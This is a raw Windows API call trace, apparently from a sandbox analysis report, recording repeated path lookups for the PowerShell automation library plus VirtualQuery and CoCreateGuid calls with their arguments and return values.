	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.810] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.811] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.811] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.811] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.812] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b500, lpBuffer=0x10c3c0, dwLength=0x30 | out: lpBuffer=0x10c3c0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.813] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x39360078, Data2=0x6482, Data3=0x420f, Data4=([0]=0x82, [1]=0x80, [2]=0x15, [3]=0x16, [4]=0x80, [5]=0x83, [6]=0xd5, [7]=0xb0))) returned 0x0
	[0353.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.814] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xc556fecc, Data2=0x915c, Data3=0x4579, Data4=([0]=0x89, [1]=0x36, [2]=0x87, [3]=0x5b, [4]=0xc2, [5]=0x8a, [6]=0x9c, [7]=0x55))) returned 0x0
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.817] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.818] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.818] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
